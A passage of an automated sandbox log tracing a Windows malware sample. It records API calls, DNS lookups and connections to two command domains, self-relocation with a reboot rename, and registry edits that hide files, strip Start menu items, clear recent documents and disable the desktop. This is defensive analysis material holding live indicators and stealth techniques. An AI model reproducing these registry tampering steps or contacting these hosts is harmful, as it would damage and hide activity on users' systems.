   htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;.scr;
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  windoscarsep.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.7   Hostname:  windoscarsep.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.7
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  unocardgam.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.8   Hostname:  unocardgam.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.8
  Imagepath:  C:\2917522723.exe
1108
File
Cutpaste
Old Name:   C:\2917522723.exe
New Name:   C:\DOCUME~1\admin\LOCALS~1\Temp\UZ5uPYHL8nfdS6.exe.tmp
  Imagepath:  C:\2917522723.exe
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
1108328192
Malicious  Alert
Misc  Anomaly
Message:   Rootkit behavior observed    Detail:   Malware moves source binary   
API Call
  API Name:  GetLocalTime   Address:  0x00410df5
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemTime   Address:  0x00410dff
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\"PendingFileRenameOperations" = \??\C
   :\DOCUME~1\admin\LOCALS~1\Temp\UZ5uPYHL8nfdS6.exe.tmp null 
1108
Malicious  Alert
Misc  Anomaly
Message:   Post reboot modification    Detail:   Malware scheduling files to be renamed upon reboot   
API Call
  API Name:  IsDebuggerPresent   Address:  0x5ad7b1ba
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Process
Terminated
C:\2917522723.exe
  Parentname:  C:\WINDOWS\system32\cmd.exe
  Command Line:  N/A
11081228
API Call
  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x00000114, 5000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76fd8a1d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = cd 81 6f ce 39 e1 58 fc f5 90 7d 27 2
   c a7 1f 85 8d 7e d7 94 fd 03 b0 91 19 9a d6 31 b0 e7 0c f2 fe d3 cd f4 26 82 81 54 ff 73 25 d9 3d
    56 ff f2 81 0e 3a bf da b8 99 50 04 15 5d 89 1c ce 18 fb 7b f0 aa d3 0f 98 e7 e2 2e d9 b1 93 2c
   36 6b 36
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 66 9c 2f 8c de 8e d0 ab 81 60 5a 30 7
   f 95 bb 32 56 42 dc 57 4f ac 7b 7e c0 b8 cc 85 99 4e e3 97 f2 41 3e 75 78 39 f8 aa 48 3d 55 0a 1f
    a9 21 f7 b5 0e 93 3e a7 8e e5 af e0 73 4c 32 c9 0f 77 70 59 e1 4a 73 23 cf 19 c0 68 bf 26 49 e4
   47 ea 8f
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = ab 9d ab 33 63 20 93 47 4e 5c db e7 4
   2 34 95 ba 10 ac a4 2c 9d da eb 31 fe 5f b7 cc 4b f2 c5 aa c3 4a 39 b9 93 a6 99 de 0c 21 95 0b b1
    68 8c 6f dd a6 a4 13 e7 b0 87 2e f6 26 b1 a6 08 5f 8c d1 f3 fd 63 62 a1 a3 93 62 8c 75 f2 ca fd
   22 e3 17
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 08 8a 8a 3a d8 88 83 20 37 1e 40 57 8
   5 ac f3 7f d3 da a5 fa ea ad ee 3f 5d e1 e6 d3 5c d8 c9 c0 a6 a9 90 8a c1 48 c8 95 62 62 db ab 55
    49 2d 9c 47 d6 de 23 f2 96 dd 9e 47 6a 09 e6 26 3c 57 9f 7d b3 ac 7b c7 fb fc 58 82 2b 9e a8 08
   82 d3 ff
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 03 09 d6 88 c0 e1 2d 3f 37 12 32 18 e
   d 94 23 ba 2a 8d b7 59 3e 22 27 44 b1 cf e6 ae 1a e7 47 4b 22 59 b4 ab 58 57 6d b6 09 6d af fb 56
    49 ae 72 9d 90 eb aa f0 a7 31 44 8b d3 ec d9 04 31 da 66 a0 5d 57 6d 05 cd dd 1d d2 dc 5d 59 d2
   a6 49 51
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = c8 fe 05 07 af 7f 65 c4 5e 78 31 b8 b
   b 1a 9e af 5c cd de 28 68 02 db 13 aa 5f ef 8c 00 21 7e f5 60 03 41 6e 8d c1 8c 83 d4 28 62 b2 f1
    43 4e d4 0d 49 76 3e 95 84 25 f9 00 fa 11 dc 27 07 ca 72 2c c3 d2 e0 37 3e 09 d0 8a 17 f4 c1 a4
   04 1a 5a
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = d1 37 3e f0 ce 85 07 16 50 4f 20 22 f
   8 a6 00 b1 50 dd 10 21 2d 85 81 12 fe 33 1f 86 cf 23 1f 4b 0e 73 28 43 7f 93 ee 39 a7 ad ea 65 e1
    86 a9 16 c7 6e 01 6c 73 89 a7 43 25 ff 58 8a ad dc 6d 1e c3 78 6c 4c 15 ae 54 e1 9b 5f 2c 7d f4
   30 8d c6
1436
Mutex
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1436
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040cf43
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData"
   = C:\Documents and Settings\All Users\Application Data
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x0040ce2d
  Params:  [0x00000238, 1]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\d6a5d877-16f5-4e5f-8588-91621c1b774c
1436
API Call
  API Name:  GetLocalTime   Address:  0x00410df5
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemTime   Address:  0x00410dff
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\"0df15996-87ec-4c84-a01b-a82c45
   7edea3" =
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\"nsreg" = 0x4f224d82
1436
API Call
  API Name:  Sleep   Address:  0x00401567
  Params:  [300000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
5 Repeated items skipped
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
3 Repeated items skipped
API Call
  API Name:  Process32FirstW   Address:  0x0040cb67
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x004015a7
  Params:  [20000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\System\"DisableTaskMgr" = 0x00000000
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"DisableTaskMgr" = 0x000
   00000
1436
API Call
  API Name:  Sleep   Address:  0x004107f7
  Params:  [5000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Hidden" = 0x00000000
1436
Malicious  Alert
Misc  Anomaly
Message:   Malware trying to hide presence of files/folders    Detail:   Stealth capabilities detected   
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"ShowSuperHidden" = 0x00000000
1436
Malicious  Alert
Misc  Anomaly
Message:   Malware trying to hide presence of files    Detail:   Stealth capabilities detected   
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"TaskbarGlomming" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"TaskbarGlomLevel" = 0x00000002
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\ActiveDesktop
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\ActiveDesktop\"HidNoChangingWallPaperden" = 0x00000001
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\"EnableAutoTray" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"Recent" = C:\Documents and Settings\admin\Recent
1436
API Call
  API Name:  Sleep   Address:  0x0040278a
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x7792732c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
11 Repeated items skipped
Regkey
Deleteval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\User Shell Folders\"Recent"
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\User Shell Folders\New
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x7ca01765
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"NetHood" = C:\Documents and Settings\admin\NetHood
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x77f78648
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040278a
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\M
   UICache\"@shell32.dll,-12691" = My Recent Documents
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"Recent" = C:\Documents and Settings\admin\Recent
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs\Folder
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs\.xls
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs\.ppt
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs\.pdf
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs\.doc
1436
Regkey
Deleted
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\Explorer\"NoDesktop" = 0x00000001
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowUser" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowControlPanel" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowHelp" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowMyComputer" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowMyDocs" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowMyMusic" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowMyGames" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowMyPics" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowPrinters" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowRecentDocs" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowRun" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowSearch" = 0x00000000
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowSetProgramAccessAndDefaults" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowNetConn" = 0x00000000
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Advanced\"Start_ShowNetPlaces" = 0x00000000
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Taskband
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Taskband\"_Favorites" = 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
   00
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\StartPage\"Favorites" = ff
1436
API Call
  API Name:  Sleep   Address:  0x0040278a
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040b688
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x004027fc
  Params:  [100]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x763982de
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryA   Address:  0x755dd273
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x763982de
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
